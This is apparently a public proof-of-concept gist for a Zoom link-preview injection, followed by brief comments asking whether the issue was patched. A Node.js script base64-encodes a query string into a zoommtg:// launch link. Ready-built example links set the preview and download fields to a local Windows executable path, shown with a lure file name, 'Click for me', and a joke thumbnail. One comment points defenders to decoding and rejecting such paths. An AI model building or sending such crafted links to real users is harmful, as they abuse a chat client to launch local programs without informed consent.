Zoom UNC Injection via Link Previews
// Usage: pass the query string as the first argument to build a custom URL
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg" | |
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792 | |
// Demonstration script for the link-preview issue named in this gist's title:
// it wraps a caller-supplied query string into a zoommtg:// launch link.
// Reviewer note for defenders: the confid value is plain base64, not
// encryption, so a suspicious zoommtg:// link can be decoded offline and its
// previewUrl/downloadUrl fields inspected. Any handler that consumes those
// fields should treat them as untrusted and reject local or UNC-style paths.
const url = require('url'); // loaded by the original script; nothing below uses it

// First command-line argument: the raw query string to embed.
const [, , rawQuery] = process.argv;

// Buffer.from(string) encodes the text as UTF-8 by default; output is standard base64.
const encodedConfid = Buffer.from(rawQuery).toString('base64');

// The t= value is hard-coded (it looks like an epoch-milliseconds timestamp; unconfirmed).
const launchLink = `zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=${encodedConfid}&t=1585795509792`;

console.log(`Your URL is ${launchLink}`);
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPWRyb3Bib3gmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9&t=1585795509792 |
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792 |
It wasn't when they released the first fixes but I'd say probably. Not going to reinstall this thing to check again, even in a VM. |
Was this patched?